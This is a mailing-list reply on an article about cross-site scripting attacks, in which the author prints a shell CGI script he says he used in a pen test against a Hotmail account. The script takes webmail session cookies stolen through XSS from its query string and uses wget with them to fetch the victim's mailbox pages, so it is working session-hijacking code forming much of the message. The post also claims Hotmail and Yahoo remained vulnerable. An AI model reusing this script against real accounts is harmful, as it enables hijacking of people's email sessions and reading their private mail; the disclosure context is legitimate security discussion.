Re: Evolution of Cross-Site Scripting Attacks

[FozZy <fozzy () dmpfrance com>]

Great ! This article is a very good explanation of how to set-up an attack against web apps by using XSS.

However, it is not really a "prediction" of a new type of attack: several people (including me ;) have pointed out in 
the past on this mailing-list that attacks against webmails can be easily automated by a script.  Here is a very lame 
shell cgi I used for a pen test against a hotmail account:

$ cat /var/www/cgi-bin/recupmail.cgi  
#!/bin/sh
echo Content-type: text/plain
echo

set -f
URL=`echo $QUERY_STRING | cut -d '*' -f 1 | cut -d '&' -f -2`
URL_MESSAGE=`echo $QUERY_STRING | cut -d '*' -f 1`
COOKIES=`echo $QUERY_STRING | cut -d '*' -f 2 | /usr/local/sbin/urldecode.sh`
echo URL = $URL
echo COOKIES = $COOKIES
cd /home/fozzy/tmp/hotmail
nohup wget -b --user-agent='Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; BVRP Software)' -r -l 1 -o 
/tmp/recupmail.log --header="Cookie: $COOKIES" -nd $URL &
nohup wget -b --user-agent='Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; BVRP Software)' -r -l 1 -o 
/tmp/recupmail.log --header="Cookie: $COOKIES" -nd $URL_MESSAGE &


I also used php scripts to prove that i could crack into my accounts on many french webmails 7 months ago. Everything 
was published in a french newspaper (Hackerz Voice) but I did not put it on the web cause i fear script-kiddies, and 
the code is not really interesting (it is quite straight-forward).
If I was able to do that, surely many other people did the same thing. So, I am sure it is exploited "in the wild" 
since a long time. :(

BTW, two weeks ago, Hotmail and Yahoo was still vulnerable to XSS...

FozZy

Hackademy / Hackerz Voice
http://www.dmpfrance.com